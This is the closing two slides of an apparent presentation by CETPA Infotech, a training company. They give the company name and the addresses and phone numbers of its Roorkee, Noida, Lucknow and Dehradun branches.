  • 41. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 42. CETPA Roorkee #200, Purvawali, 2nd Floor (Opp. Railway Ticket Agency) Railway Road, Ganeshpur, Roorkee - 247667 Contact Us: +91-9219602769, 01332-270218 Fax - 1332 - 274960CETPA Noida D-58, Sector-2, Red FM Lane, Noida -201301, Uttar Pradesh Contact Us: 0120- 3839555, +91-9212172602 CETPA Lucknow #401 A, 4th Floor, Lekhraj Khazana, Faizabad Road , Indira Nagar, Lucknow - 226016 Uttar Pradesh Contact: +91-9258017974, 0522-6590802 CETPA Dehradun 105, Mohit Vihar, Near Kamla Palace, GMS Road, Dehradun-248001,UK Contact: +91-9219602771, 0135- 6006070